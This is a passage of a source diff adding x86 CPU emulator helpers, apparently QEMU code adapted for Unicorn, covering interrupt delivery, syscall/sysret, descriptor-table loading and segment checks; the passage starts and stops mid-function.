esp, sp_mask, env->regs[R_ESP]); + } + PUSHW(ssp, esp, sp_mask, cpu_compute_eflags(env)); + PUSHW(ssp, esp, sp_mask, env->segs[R_CS].selector); + PUSHW(ssp, esp, sp_mask, old_eip); + if (has_error_code) { + PUSHW(ssp, esp, sp_mask, error_code); + } + } + + /* interrupt gate clear IF mask */ + if ((type & 1) == 0) { + env->eflags &= ~IF_MASK; + } + env->eflags &= ~(TF_MASK | VM_MASK | RF_MASK | NT_MASK); + + if (new_stack) { + if (vm86) { + cpu_x86_load_seg_cache(env, R_ES, 0, 0, 0, 0); + cpu_x86_load_seg_cache(env, R_DS, 0, 0, 0, 0); + cpu_x86_load_seg_cache(env, R_FS, 0, 0, 0, 0); + cpu_x86_load_seg_cache(env, R_GS, 0, 0, 0, 0); + } + ss = (ss & ~3) | dpl; + cpu_x86_load_seg_cache(env, R_SS, ss, + ssp, get_seg_limit(ss_e1, ss_e2), ss_e2); + } + SET_ESP(esp, sp_mask); + + selector = (selector & ~3) | dpl; + cpu_x86_load_seg_cache(env, R_CS, selector, + get_seg_base(e1, e2), + get_seg_limit(e1, e2), + e2); + env->eip = offset; +} + +#ifdef TARGET_X86_64 + +#define PUSHQ(sp, val) \ + { \ + sp -= 8; \ + cpu_stq_kernel(env, sp, (val)); \ + } + +#define POPQ(sp, val) \ + { \ + val = cpu_ldq_kernel(env, sp); \ + sp += 8; \ + } + +static inline target_ulong get_rsp_from_tss(CPUX86State *env, int level) +{ + X86CPU *cpu = x86_env_get_cpu(env); + int index; + +#if 0 + printf("TR: base=" TARGET_FMT_lx " limit=%x\n", + env->tr.base, env->tr.limit); +#endif + + if (!(env->tr.flags & DESC_P_MASK)) { + cpu_abort(CPU(cpu), "invalid tss"); + } + index = 8 * level + 4; + if ((index + 7) > env->tr.limit) { + raise_exception_err(env, EXCP0A_TSS, env->tr.selector & 0xfffc); + } + return cpu_ldq_kernel(env, env->tr.base + index); +} + +/* 64 bit interrupt */ +static void do_interrupt64(CPUX86State *env, int intno, int is_int, + int error_code, target_ulong next_eip, int is_hw) // qq +{ + SegmentCache *dt; + target_ulong ptr; + int type, dpl, selector, cpl, ist; + int has_error_code, new_stack; + uint32_t e1, e2, e3, ss; + target_ulong old_eip, esp, offset; + + has_error_code = 0; + if 
(!is_int && !is_hw) { + has_error_code = exception_has_error_code(intno); + } + if (is_int) { + old_eip = next_eip; + } else { + old_eip = env->eip; + } + + dt = &env->idt; + if (intno * 16 + 15 > dt->limit) { + raise_exception_err(env, EXCP0D_GPF, intno * 16 + 2); + } + ptr = dt->base + intno * 16; + e1 = cpu_ldl_kernel(env, ptr); + e2 = cpu_ldl_kernel(env, ptr + 4); + e3 = cpu_ldl_kernel(env, ptr + 8); + /* check gate type */ + type = (e2 >> DESC_TYPE_SHIFT) & 0x1f; + switch (type) { + case 14: /* 386 interrupt gate */ + case 15: /* 386 trap gate */ + break; + default: + raise_exception_err(env, EXCP0D_GPF, intno * 16 + 2); + break; + } + dpl = (e2 >> DESC_DPL_SHIFT) & 3; + cpl = env->hflags & HF_CPL_MASK; + /* check privilege if software int */ + if (is_int && dpl < cpl) { + raise_exception_err(env, EXCP0D_GPF, intno * 16 + 2); + } + /* check valid bit */ + if (!(e2 & DESC_P_MASK)) { + raise_exception_err(env, EXCP0B_NOSEG, intno * 16 + 2); + } + selector = e1 >> 16; + offset = ((target_ulong)e3 << 32) | (e2 & 0xffff0000) | (e1 & 0x0000ffff); + ist = e2 & 7; + if ((selector & 0xfffc) == 0) { + raise_exception_err(env, EXCP0D_GPF, 0); + } + + if (load_segment(env, &e1, &e2, selector) != 0) { + raise_exception_err(env, EXCP0D_GPF, selector & 0xfffc); + } + if (!(e2 & DESC_S_MASK) || !(e2 & (DESC_CS_MASK))) { + raise_exception_err(env, EXCP0D_GPF, selector & 0xfffc); + } + dpl = (e2 >> DESC_DPL_SHIFT) & 3; + if (dpl > cpl) { + raise_exception_err(env, EXCP0D_GPF, selector & 0xfffc); + } + if (!(e2 & DESC_P_MASK)) { + raise_exception_err(env, EXCP0B_NOSEG, selector & 0xfffc); + } + if (!(e2 & DESC_L_MASK) || (e2 & DESC_B_MASK)) { + raise_exception_err(env, EXCP0D_GPF, selector & 0xfffc); + } + if ((!(e2 & DESC_C_MASK) && dpl < cpl) || ist != 0) { + /* to inner privilege */ + new_stack = 1; + esp = get_rsp_from_tss(env, ist != 0 ? 
ist + 3 : dpl); + ss = 0; + } else if ((e2 & DESC_C_MASK) || dpl == cpl) { + /* to same privilege */ + if (env->eflags & VM_MASK) { + raise_exception_err(env, EXCP0D_GPF, selector & 0xfffc); + } + new_stack = 0; + esp = env->regs[R_ESP]; + dpl = cpl; + } else { + raise_exception_err(env, EXCP0D_GPF, selector & 0xfffc); + new_stack = 0; /* avoid warning */ + esp = 0; /* avoid warning */ + } + esp &= ~0xfLL; /* align stack */ + + PUSHQ(esp, env->segs[R_SS].selector); + PUSHQ(esp, env->regs[R_ESP]); + PUSHQ(esp, cpu_compute_eflags(env)); + PUSHQ(esp, env->segs[R_CS].selector); + PUSHQ(esp, old_eip); + if (has_error_code) { + PUSHQ(esp, error_code); + } + + /* interrupt gate clear IF mask */ + if ((type & 1) == 0) { + env->eflags &= ~IF_MASK; + } + env->eflags &= ~(TF_MASK | VM_MASK | RF_MASK | NT_MASK); + + if (new_stack) { + ss = 0 | dpl; + cpu_x86_load_seg_cache(env, R_SS, ss, 0, 0, 0); + } + env->regs[R_ESP] = esp; + + selector = (selector & ~3) | dpl; + cpu_x86_load_seg_cache(env, R_CS, selector, + get_seg_base(e1, e2), + get_seg_limit(e1, e2), + e2); + env->eip = offset; +} +#endif + +#ifdef TARGET_X86_64 +#if defined(CONFIG_USER_ONLY) +void helper_syscall(CPUX86State *env, int next_eip_addend) +{ + CPUState *cs = CPU(x86_env_get_cpu(env)); + + cs->exception_index = EXCP_SYSCALL; + env->exception_next_eip = env->eip + next_eip_addend; + cpu_loop_exit(cs); +} +#else +void helper_syscall(CPUX86State *env, int next_eip_addend) +{ + // Unicorn: call registered syscall hooks + struct hook *hook; + HOOK_FOREACH_VAR_DECLARE; + HOOK_FOREACH(env->uc, hook, UC_HOOK_INSN) { + if (hook->to_delete) + continue; + if (!HOOK_BOUND_CHECK(hook, env->eip)) + continue; + if (hook->insn == UC_X86_INS_SYSCALL) + ((uc_cb_insn_syscall_t)hook->callback)(env->uc, hook->user_data); + } + + env->eip += next_eip_addend; + return; +/* + int selector; + + if (!(env->efer & MSR_EFER_SCE)) { + raise_exception_err(env, EXCP06_ILLOP, 0); + } + selector = (env->star >> 32) & 0xffff; + if 
(env->hflags & HF_LMA_MASK) { + int code64; + + env->regs[R_ECX] = env->eip + next_eip_addend; + env->regs[11] = cpu_compute_eflags(env); + + code64 = env->hflags & HF_CS64_MASK; + + env->eflags &= ~env->fmask; + cpu_load_eflags(env, env->eflags, 0); + cpu_x86_load_seg_cache(env, R_CS, selector & 0xfffc, + 0, 0xffffffff, + DESC_G_MASK | DESC_P_MASK | + DESC_S_MASK | + DESC_CS_MASK | DESC_R_MASK | DESC_A_MASK | + DESC_L_MASK); + cpu_x86_load_seg_cache(env, R_SS, (selector + 8) & 0xfffc, + 0, 0xffffffff, + DESC_G_MASK | DESC_B_MASK | DESC_P_MASK | + DESC_S_MASK | + DESC_W_MASK | DESC_A_MASK); + if (code64) { + env->eip = env->lstar; + } else { + env->eip = env->cstar; + } + } else { + env->regs[R_ECX] = (uint32_t)(env->eip + next_eip_addend); + + env->eflags &= ~(IF_MASK | RF_MASK | VM_MASK); + cpu_x86_load_seg_cache(env, R_CS, selector & 0xfffc, + 0, 0xffffffff, + DESC_G_MASK | DESC_B_MASK | DESC_P_MASK | + DESC_S_MASK | + DESC_CS_MASK | DESC_R_MASK | DESC_A_MASK); + cpu_x86_load_seg_cache(env, R_SS, (selector + 8) & 0xfffc, + 0, 0xffffffff, + DESC_G_MASK | DESC_B_MASK | DESC_P_MASK | + DESC_S_MASK | + DESC_W_MASK | DESC_A_MASK); + env->eip = (uint32_t)env->star; + } +*/ +} +#endif +#endif + +#ifdef TARGET_X86_64 +void helper_sysret(CPUX86State *env, int dflag) +{ + int cpl, selector; + + if (!(env->efer & MSR_EFER_SCE)) { + raise_exception_err(env, EXCP06_ILLOP, 0); + } + cpl = env->hflags & HF_CPL_MASK; + if (!(env->cr[0] & CR0_PE_MASK) || cpl != 0) { + raise_exception_err(env, EXCP0D_GPF, 0); + } + selector = (env->star >> 48) & 0xffff; + if (env->hflags & HF_LMA_MASK) { + cpu_load_eflags(env, (uint32_t)(env->regs[11]), TF_MASK | AC_MASK + | ID_MASK | IF_MASK | IOPL_MASK | VM_MASK | RF_MASK | + NT_MASK); + if (dflag == 2) { + cpu_x86_load_seg_cache(env, R_CS, (selector + 16) | 3, + 0, 0xffffffff, + DESC_G_MASK | DESC_P_MASK | + DESC_S_MASK | (3 << DESC_DPL_SHIFT) | + DESC_CS_MASK | DESC_R_MASK | DESC_A_MASK | + DESC_L_MASK); + env->eip = env->regs[R_ECX]; + } 
else { + cpu_x86_load_seg_cache(env, R_CS, selector | 3, + 0, 0xffffffff, + DESC_G_MASK | DESC_B_MASK | DESC_P_MASK | + DESC_S_MASK | (3 << DESC_DPL_SHIFT) | + DESC_CS_MASK | DESC_R_MASK | DESC_A_MASK); + env->eip = (uint32_t)env->regs[R_ECX]; + } + cpu_x86_load_seg_cache(env, R_SS, selector + 8, + 0, 0xffffffff, + DESC_G_MASK | DESC_B_MASK | DESC_P_MASK | + DESC_S_MASK | (3 << DESC_DPL_SHIFT) | + DESC_W_MASK | DESC_A_MASK); + } else { + env->eflags |= IF_MASK; + cpu_x86_load_seg_cache(env, R_CS, selector | 3, + 0, 0xffffffff, + DESC_G_MASK | DESC_B_MASK | DESC_P_MASK | + DESC_S_MASK | (3 << DESC_DPL_SHIFT) | + DESC_CS_MASK | DESC_R_MASK | DESC_A_MASK); + env->eip = (uint32_t)env->regs[R_ECX]; + cpu_x86_load_seg_cache(env, R_SS, selector + 8, + 0, 0xffffffff, + DESC_G_MASK | DESC_B_MASK | DESC_P_MASK | + DESC_S_MASK | (3 << DESC_DPL_SHIFT) | + DESC_W_MASK | DESC_A_MASK); + } +} +#endif + +/* real mode interrupt */ +static void do_interrupt_real(CPUX86State *env, int intno, int is_int, + int error_code, unsigned int next_eip) // qq +{ + SegmentCache *dt; + target_ulong ptr, ssp; + int selector; + uint32_t offset, esp; + uint32_t old_cs, old_eip; + + /* real mode (simpler!) */ + dt = &env->idt; + if (intno * 4 + 3 > dt->limit) { + raise_exception_err(env, EXCP0D_GPF, intno * 8 + 2); + } + ptr = dt->base + intno * 4; + offset = cpu_lduw_kernel(env, ptr); + selector = cpu_lduw_kernel(env, ptr + 2); + esp = env->regs[R_ESP]; + ssp = env->segs[R_SS].base; + if (is_int) { + old_eip = next_eip; + } else { + old_eip = env->eip; + } + old_cs = env->segs[R_CS].selector; + /* XXX: use SS segment size? 
*/ + PUSHW(ssp, esp, 0xffff, cpu_compute_eflags(env)); + PUSHW(ssp, esp, 0xffff, old_cs); + PUSHW(ssp, esp, 0xffff, old_eip); + + /* update processor state */ + env->regs[R_ESP] = (env->regs[R_ESP] & ~0xffff) | (esp & 0xffff); + env->eip = offset; + env->segs[R_CS].selector = selector; + env->segs[R_CS].base = (selector << 4); + env->eflags &= ~(IF_MASK | TF_MASK | AC_MASK | RF_MASK); +} + +#if defined(CONFIG_USER_ONLY) +/* fake user mode interrupt */ +static void do_interrupt_user(CPUX86State *env, int intno, int is_int, + int error_code, target_ulong next_eip) +{ + SegmentCache *dt; + target_ulong ptr; + int dpl, cpl, shift; + uint32_t e2; + + dt = &env->idt; + if (env->hflags & HF_LMA_MASK) { + shift = 4; + } else { + shift = 3; + } + ptr = dt->base + (intno << shift); + e2 = cpu_ldl_kernel(env, ptr + 4); + + dpl = (e2 >> DESC_DPL_SHIFT) & 3; + cpl = env->hflags & HF_CPL_MASK; + /* check privilege if software int */ + if (is_int && dpl < cpl) { + raise_exception_err(env, EXCP0D_GPF, (intno << shift) + 2); + } + + /* Since we emulate only user space, we cannot do more than + exiting the emulation with the suitable exception and error + code. So update EIP for INT 0x80 and EXCP_SYSCALL. 
*/ + if (is_int || intno == EXCP_SYSCALL) { + env->eip = next_eip; + } +} + +#else + +static void handle_even_inj(CPUX86State *env, int intno, int is_int, + int error_code, int is_hw, int rm) +{ + CPUState *cs = CPU(x86_env_get_cpu(env)); + uint32_t event_inj = ldl_phys(cs->as, env->vm_vmcb + offsetof(struct vmcb, + control.event_inj)); + + if (!(event_inj & SVM_EVTINJ_VALID)) { + int type; + + if (is_int) { + type = SVM_EVTINJ_TYPE_SOFT; + } else { + type = SVM_EVTINJ_TYPE_EXEPT; + } + event_inj = intno | type | SVM_EVTINJ_VALID; + if (!rm && exception_has_error_code(intno)) { + event_inj |= SVM_EVTINJ_VALID_ERR; + stl_phys(cs->as, env->vm_vmcb + offsetof(struct vmcb, + control.event_inj_err), + error_code); + } + stl_phys(cs->as, + env->vm_vmcb + offsetof(struct vmcb, control.event_inj), + event_inj); + } +} +#endif + +/* + * Begin execution of an interruption. is_int is TRUE if coming from + * the int instruction. next_eip is the env->eip value AFTER the interrupt + * instruction. It is only relevant if is_int is TRUE. 
+ */ +static void do_interrupt_all(X86CPU *cpu, int intno, int is_int, + int error_code, target_ulong next_eip, int is_hw) +{ + CPUX86State *env = &cpu->env; + + if (qemu_loglevel_mask(CPU_LOG_INT)) { + if ((env->cr[0] & CR0_PE_MASK)) { + //static int count; + + //qemu_log("%6d: v=%02x e=%04x i=%d cpl=%d IP=%04x:" TARGET_FMT_lx + // " pc=" TARGET_FMT_lx " SP=%04x:" TARGET_FMT_lx, + // count, intno, error_code, is_int, + // env->hflags & HF_CPL_MASK, + // env->segs[R_CS].selector, env->eip, + // (int)env->segs[R_CS].base + env->eip, + // env->segs[R_SS].selector, env->regs[R_ESP]); + if (intno == 0x0e) { + qemu_log(" CR2=" TARGET_FMT_lx, env->cr[2]); + } else { + qemu_log(" env->regs[R_EAX]=" TARGET_FMT_lx, env->regs[R_EAX]); + } + qemu_log("\n"); + log_cpu_state(CPU(cpu), CPU_DUMP_CCOP); +#if 0 + { + int i; + target_ulong ptr; + + qemu_log(" code="); + ptr = env->segs[R_CS].base + env->eip; + for (i = 0; i < 16; i++) { + qemu_log(" %02x", ldub(ptr + i)); + } + qemu_log("\n"); + } +#endif + //count++; + } + } + if (env->cr[0] & CR0_PE_MASK) { +#if !defined(CONFIG_USER_ONLY) + if (env->hflags & HF_SVMI_MASK) { + handle_even_inj(env, intno, is_int, error_code, is_hw, 0); + } +#endif +#ifdef TARGET_X86_64 + if (env->hflags & HF_LMA_MASK) { + do_interrupt64(env, intno, is_int, error_code, next_eip, is_hw); + } else +#endif + { + do_interrupt_protected(env, intno, is_int, error_code, next_eip, + is_hw); + } + } else { +#if !defined(CONFIG_USER_ONLY) + if (env->hflags & HF_SVMI_MASK) { + handle_even_inj(env, intno, is_int, error_code, is_hw, 1); + } +#endif + do_interrupt_real(env, intno, is_int, error_code, next_eip); + } + +#if !defined(CONFIG_USER_ONLY) + if (env->hflags & HF_SVMI_MASK) { + CPUState *cs = CPU(cpu); + uint32_t event_inj = ldl_phys(cs->as, env->vm_vmcb + + offsetof(struct vmcb, + control.event_inj)); + + stl_phys(cs->as, + env->vm_vmcb + offsetof(struct vmcb, control.event_inj), + event_inj & ~SVM_EVTINJ_VALID); + } +#endif +} + +void 
x86_cpu_do_interrupt(CPUState *cs) +{ + X86CPU *cpu = X86_CPU(cs->uc, cs); + CPUX86State *env = &cpu->env; + +#if defined(CONFIG_USER_ONLY) + /* if user mode only, we simulate a fake exception + which will be handled outside the cpu execution + loop */ + do_interrupt_user(env, cs->exception_index, + env->exception_is_int, + env->error_code, + env->exception_next_eip); + /* successfully delivered */ + env->old_exception = -1; +#else + /* simulate a real cpu exception. On i386, it can + trigger new exceptions, but we do not handle + double or triple faults yet. */ + do_interrupt_all(cpu, cs->exception_index, + env->exception_is_int, + env->error_code, + env->exception_next_eip, 0); + /* successfully delivered */ + env->old_exception = -1; +#endif +} + +void do_interrupt_x86_hardirq(CPUX86State *env, int intno, int is_hw) +{ + do_interrupt_all(x86_env_get_cpu(env), intno, 0, 0, 0, is_hw); +} + +bool x86_cpu_exec_interrupt(CPUState *cs, int interrupt_request) +{ + X86CPU *cpu = X86_CPU(cs->uc, cs); + CPUX86State *env = &cpu->env; + bool ret = false; + +#if !defined(CONFIG_USER_ONLY) + if (interrupt_request & CPU_INTERRUPT_POLL) { + cs->interrupt_request &= ~CPU_INTERRUPT_POLL; + apic_poll_irq(cpu->apic_state); + } +#endif + if (interrupt_request & CPU_INTERRUPT_SIPI) { + do_cpu_sipi(cpu); + } else if (env->hflags2 & HF2_GIF_MASK) { + if ((interrupt_request & CPU_INTERRUPT_SMI) && + !(env->hflags & HF_SMM_MASK)) { + cpu_svm_check_intercept_param(env, SVM_EXIT_SMI, 0); + cs->interrupt_request &= ~CPU_INTERRUPT_SMI; + do_smm_enter(cpu); + ret = true; + } else if ((interrupt_request & CPU_INTERRUPT_NMI) && + !(env->hflags2 & HF2_NMI_MASK)) { + cs->interrupt_request &= ~CPU_INTERRUPT_NMI; + env->hflags2 |= HF2_NMI_MASK; + do_interrupt_x86_hardirq(env, EXCP02_NMI, 1); + ret = true; + } else if (interrupt_request & CPU_INTERRUPT_MCE) { + cs->interrupt_request &= ~CPU_INTERRUPT_MCE; + do_interrupt_x86_hardirq(env, EXCP12_MCHK, 0); + ret = true; + } else if ((interrupt_request 
& CPU_INTERRUPT_HARD) && + (((env->hflags2 & HF2_VINTR_MASK) && + (env->hflags2 & HF2_HIF_MASK)) || + (!(env->hflags2 & HF2_VINTR_MASK) && + (env->eflags & IF_MASK && + !(env->hflags & HF_INHIBIT_IRQ_MASK))))) { + int intno; + cpu_svm_check_intercept_param(env, SVM_EXIT_INTR, 0); + cs->interrupt_request &= ~(CPU_INTERRUPT_HARD | + CPU_INTERRUPT_VIRQ); + intno = cpu_get_pic_interrupt(env); + qemu_log_mask(CPU_LOG_TB_IN_ASM, + "Servicing hardware INT=0x%02x\n", intno); + do_interrupt_x86_hardirq(env, intno, 1); + /* ensure that no TB jump will be modified as + the program flow was changed */ + ret = true; +#if !defined(CONFIG_USER_ONLY) + } else if ((interrupt_request & CPU_INTERRUPT_VIRQ) && + (env->eflags & IF_MASK) && + !(env->hflags & HF_INHIBIT_IRQ_MASK)) { + int intno; + /* FIXME: this should respect TPR */ + cpu_svm_check_intercept_param(env, SVM_EXIT_VINTR, 0); + intno = ldl_phys(cs->as, env->vm_vmcb + + offsetof(struct vmcb, control.int_vector)); + qemu_log_mask(CPU_LOG_TB_IN_ASM, + "Servicing virtual hardware INT=0x%02x\n", intno); + do_interrupt_x86_hardirq(env, intno, 1); + cs->interrupt_request &= ~CPU_INTERRUPT_VIRQ; + ret = true; +#endif + } + } + + return ret; +} + +void helper_enter_level(CPUX86State *env, int level, int data32, + target_ulong t1) +{ + target_ulong ssp; + uint32_t esp_mask, esp, ebp; + + esp_mask = get_sp_mask(env->segs[R_SS].flags); + ssp = env->segs[R_SS].base; + ebp = env->regs[R_EBP]; + esp = env->regs[R_ESP]; + if (data32) { + /* 32 bit */ + esp -= 4; + while (--level) { + esp -= 4; + ebp -= 4; + cpu_stl_data(env, ssp + (esp & esp_mask), + cpu_ldl_data(env, ssp + (ebp & esp_mask))); + } + esp -= 4; + cpu_stl_data(env, ssp + (esp & esp_mask), t1); + } else { + /* 16 bit */ + esp -= 2; + while (--level) { + esp -= 2; + ebp -= 2; + cpu_stw_data(env, ssp + (esp & esp_mask), + cpu_lduw_data(env, ssp + (ebp & esp_mask))); + } + esp -= 2; + cpu_stw_data(env, ssp + (esp & esp_mask), t1); + } +} + +#ifdef TARGET_X86_64 +void 
helper_enter64_level(CPUX86State *env, int level, int data64, + target_ulong t1) +{ + target_ulong esp, ebp; + + ebp = env->regs[R_EBP]; + esp = env->regs[R_ESP]; + + if (data64) { + /* 64 bit */ + esp -= 8; + while (--level) { + esp -= 8; + ebp -= 8; + cpu_stq_data(env, esp, cpu_ldq_data(env, ebp)); + } + esp -= 8; + cpu_stq_data(env, esp, t1); + } else { + /* 16 bit */ + esp -= 2; + while (--level) { + esp -= 2; + ebp -= 2; + cpu_stw_data(env, esp, cpu_lduw_data(env, ebp)); + } + esp -= 2; + cpu_stw_data(env, esp, t1); + } +} +#endif + +void helper_lldt(CPUX86State *env, int selector) +{ + SegmentCache *dt; + uint32_t e1, e2; + int index, entry_limit; + target_ulong ptr; + + selector &= 0xffff; + if ((selector & 0xfffc) == 0) { + /* XXX: NULL selector case: invalid LDT */ + env->ldt.base = 0; + env->ldt.limit = 0; + } else { + if (selector & 0x4) { + raise_exception_err(env, EXCP0D_GPF, selector & 0xfffc); + } + dt = &env->gdt; + index = selector & ~7; +#ifdef TARGET_X86_64 + if (env->hflags & HF_LMA_MASK) { + entry_limit = 15; + } else +#endif + { + entry_limit = 7; + } + if ((index + entry_limit) > dt->limit) { + raise_exception_err(env, EXCP0D_GPF, selector & 0xfffc); + } + ptr = dt->base + index; + e1 = cpu_ldl_kernel(env, ptr); + e2 = cpu_ldl_kernel(env, ptr + 4); + if ((e2 & DESC_S_MASK) || ((e2 >> DESC_TYPE_SHIFT) & 0xf) != 2) { + raise_exception_err(env, EXCP0D_GPF, selector & 0xfffc); + } + if (!(e2 & DESC_P_MASK)) { + raise_exception_err(env, EXCP0B_NOSEG, selector & 0xfffc); + } +#ifdef TARGET_X86_64 + if (env->hflags & HF_LMA_MASK) { + uint32_t e3; + + e3 = cpu_ldl_kernel(env, ptr + 8); + load_seg_cache_raw_dt(&env->ldt, e1, e2); + env->ldt.base |= (target_ulong)e3 << 32; + } else +#endif + { + load_seg_cache_raw_dt(&env->ldt, e1, e2); + } + } + env->ldt.selector = selector; +} + +void helper_ltr(CPUX86State *env, int selector) +{ + SegmentCache *dt; + uint32_t e1, e2; + int index, type, entry_limit; + target_ulong ptr; + + selector &= 0xffff; + if 
((selector & 0xfffc) == 0) { + /* NULL selector case: invalid TR */ + env->tr.base = 0; + env->tr.limit = 0; + env->tr.flags = 0; + } else { + if (selector & 0x4) { + raise_exception_err(env, EXCP0D_GPF, selector & 0xfffc); + } + dt = &env->gdt; + index = selector & ~7; +#ifdef TARGET_X86_64 + if (env->hflags & HF_LMA_MASK) { + entry_limit = 15; + } else +#endif + { + entry_limit = 7; + } + if ((index + entry_limit) > dt->limit) { + raise_exception_err(env, EXCP0D_GPF, selector & 0xfffc); + } + ptr = dt->base + index; + e1 = cpu_ldl_kernel(env, ptr); + e2 = cpu_ldl_kernel(env, ptr + 4); + type = (e2 >> DESC_TYPE_SHIFT) & 0xf; + if ((e2 & DESC_S_MASK) || + (type != 1 && type != 9)) { + raise_exception_err(env, EXCP0D_GPF, selector & 0xfffc); + } + if (!(e2 & DESC_P_MASK)) { + raise_exception_err(env, EXCP0B_NOSEG, selector & 0xfffc); + } +#ifdef TARGET_X86_64 + if (env->hflags & HF_LMA_MASK) { + uint32_t e3, e4; + + e3 = cpu_ldl_kernel(env, ptr + 8); + e4 = cpu_ldl_kernel(env, ptr + 12); + if ((e4 >> DESC_TYPE_SHIFT) & 0xf) { + raise_exception_err(env, EXCP0D_GPF, selector & 0xfffc); + } + load_seg_cache_raw_dt(&env->tr, e1, e2); + env->tr.base |= (target_ulong)e3 << 32; + } else +#endif + { + load_seg_cache_raw_dt(&env->tr, e1, e2); + } + e2 |= DESC_TSS_BUSY_MASK; + cpu_stl_kernel(env, ptr + 4, e2); + } + env->tr.selector = selector; +} + +// Unicorn: check the arguments before run cpu_x86_load_seg(). 
+int uc_check_cpu_x86_load_seg(CPUX86State *env, int seg_reg, int sel) +{ + int selector; + uint32_t e2; + int cpl, dpl, rpl; + SegmentCache *dt; + int index; + target_ulong ptr; + + if (!(env->cr[0] & CR0_PE_MASK) || (env->eflags & VM_MASK)) { + return 0; + } else { + selector = sel & 0xffff; + cpl = env->hflags & HF_CPL_MASK; + if ((selector & 0xfffc) == 0) { + /* null selector case */ + if (seg_reg == R_SS +#ifdef TARGET_X86_64 + && (!(env->hflags & HF_CS64_MASK) || cpl == 3) +#endif + ) { + return UC_ERR_EXCEPTION; + } + return 0; + } else { + if (selector & 0x4) { + dt = &env->ldt; + } else { + dt = &env->gdt; + } + index = selector & ~7; + if ((index + 7) > dt->limit) { + return UC_ERR_EXCEPTION; + } + ptr = dt->base + index; + e2 = cpu_ldl_kernel(env, ptr + 4); + + if (!(e2 & DESC_S_MASK)) { + return UC_ERR_EXCEPTION; + } + rpl = selector & 3; + dpl = (e2 >> DESC_DPL_SHIFT) & 3; + if (seg_reg == R_SS) { + /* must be writable segment */ + if ((e2 & DESC_CS_MASK) || !(e2 & DESC_W_MASK)) { + return UC_ERR_EXCEPTION; + } + if (rpl != cpl || dpl != cpl) { + return UC_ERR_EXCEPTION; + } + } else { + /* must be readable segment */ + if ((e2 & (DESC_CS_MASK | DESC_R_MASK)) == DESC_CS_MASK) { + return UC_ERR_EXCEPTION; + } + + if (!(e2 & DESC_CS_MASK) || !(e2 & DESC_C_MASK)) { + /* if not conforming code, test rights */ + if (dpl < cpl || dpl < rpl) { + return UC_ERR_EXCEPTION; + } + } + } + + if (!(e2 & DESC_P_MASK)) { + if (seg_reg == R_SS) { + return UC_ERR_EXCEPTION; + } else { + return UC_ERR_EXCEPTION; + } + } + } + } + + return 0; +} + +/* only works if protected mode and not VM86. 
seg_reg must be != R_CS */ +void helper_load_seg(CPUX86State *env, int seg_reg, int selector) +{ + uint32_t e1, e2; + int cpl, dpl, rpl; + SegmentCache *dt; + int index; + target_ulong ptr; + + selector &= 0xffff; + cpl = env->hflags & HF_CPL_MASK; + if ((selector & 0xfffc) == 0) { + /* null selector case */ + if (seg_reg == R_SS +#ifdef TARGET_X86_64 + && (!(env->hflags & HF_CS64_MASK) || cpl == 3) +#endif + ) { + raise_exception_err(env, EXCP0D_GPF, 0); + } + cpu_x86_load_seg_cache(env, seg_reg, selector, 0, 0, 0); + } else { + + if (selector & 0x4) { + dt = &env->ldt; + } else { + dt = &env->gdt; + } + index = selector & ~7; + if ((index + 7) > dt->limit) { + raise_exception_err(env, EXCP0D_GPF, selector & 0xfffc); + } + ptr = dt->base + index; + e1 = cpu_ldl_kernel(env, ptr); + e2 = cpu_ldl_kernel(env, ptr + 4); + + if (!(e2 & DESC_S_MASK)) { + raise_exception_err(env, EXCP0D_GPF, selector & 0xfffc); + } + rpl = selector & 3; + dpl = (e2 >> DESC_DPL_SHIFT) & 3; + if (seg_reg == R_SS) { + /* must be writable segment */ + if ((e2 & DESC_CS_MASK) || !(e2 & DESC_W_MASK)) { + raise_exception_err(env, EXCP0D_GPF, selector & 0xfffc); + } + if (rpl != cpl || dpl != cpl) { + raise_exception_err(env, EXCP0D_GPF, selector & 0xfffc); + } + } else { + /* must be readable segment */ + if ((e2 & (DESC_CS_MASK | DESC_R_MASK)) == DESC_CS_MASK) { + raise_exception_err(env, EXCP0D_GPF, selector & 0xfffc); + } + + if (!(e2 & DESC_CS_MASK) || !(e2 & DESC_C_MASK)) { + /* if not conforming code, test rights */ + if (dpl < cpl || dpl < rpl) { + raise_exception_err(env, EXCP0D_GPF, selector & 0xfffc); + } + } + } + + if (!(e2 & DESC_P_MASK)) { + if (seg_reg == R_SS) { + raise_exception_err(env, EXCP0C_STACK, selector & 0xfffc); + } else { + raise_exception_err(env, EXCP0B_NOSEG, selector & 0xfffc); + } + } + + /* set the access bit if not already set */ + if (!(e2 & DESC_A_MASK)) { + e2 |= DESC_A_MASK; + cpu_stl_kernel(env, ptr + 4, e2); + } + + cpu_x86_load_seg_cache(env, seg_reg, 
selector, + get_seg_base(e1, e2), + get_seg_limit(e1, e2), + e2); +#if 0 + qemu_log("load_seg: sel=0x%04x base=0x%08lx limit=0x%08lx flags=%08x\n", + selector, (unsigned long)sc->base, sc->limit, sc->flags); +#endif + } +} + +/* protected mode jump */ +void helper_ljmp_protected(CPUX86State *env, int new_cs, target_ulong new_eip, + int next_eip_addend) +{ + int gate_cs, type; + uint32_t e1, e2, cpl, dpl, rpl, limit; + target_ulong next_eip; + + if ((new_cs & 0xfffc) == 0) { + raise_exception_err(env, EXCP0D_GPF, 0); + } + if (load_segment(env, &e1, &e2, new_cs) != 0) { + raise_exception_err(env, EXCP0D_GPF, new_cs & 0xfffc); + } + cpl = env->hflags & HF_CPL_MASK; + if (e2 & DESC_S_MASK) { + if (!(e2 & DESC_CS_MASK)) { + raise_exception_err(env, EXCP0D_GPF, new_cs & 0xfffc); + } + dpl = (e2 >> DESC_DPL_SHIFT) & 3; + if (e2 & DESC_C_MASK) { + /* conforming code segment */ + if (dpl > cpl) { + raise_exception_err(env, EXCP0D_GPF, new_cs & 0xfffc); + } + } else { + /* non conforming code segment */ + rpl = new_cs & 3; + if (rpl > cpl) { + raise_exception_err(env, EXCP0D_GPF, new_cs & 0xfffc); + } + if (dpl != cpl) { + raise_exception_err(env, EXCP0D_GPF, new_cs & 0xfffc); + } + } + if (!(e2 & DESC_P_MASK)) { + raise_exception_err(env, EXCP0B_NOSEG, new_cs & 0xfffc); + } + limit = get_seg_limit(e1, e2); + if (new_eip > limit && + !(env->hflags & HF_LMA_MASK) && !(e2 & DESC_L_MASK)) { + raise_exception_err(env, EXCP0D_GPF, new_cs & 0xfffc); + } + cpu_x86_load_seg_cache(env, R_CS, (new_cs & 0xfffc) | cpl, + get_seg_base(e1, e2), limit, e2); + env->eip = new_eip; + } else { + /* jump to call or task gate */ + dpl = (e2 >> DESC_DPL_SHIFT) & 3; + rpl = new_cs & 3; + cpl = 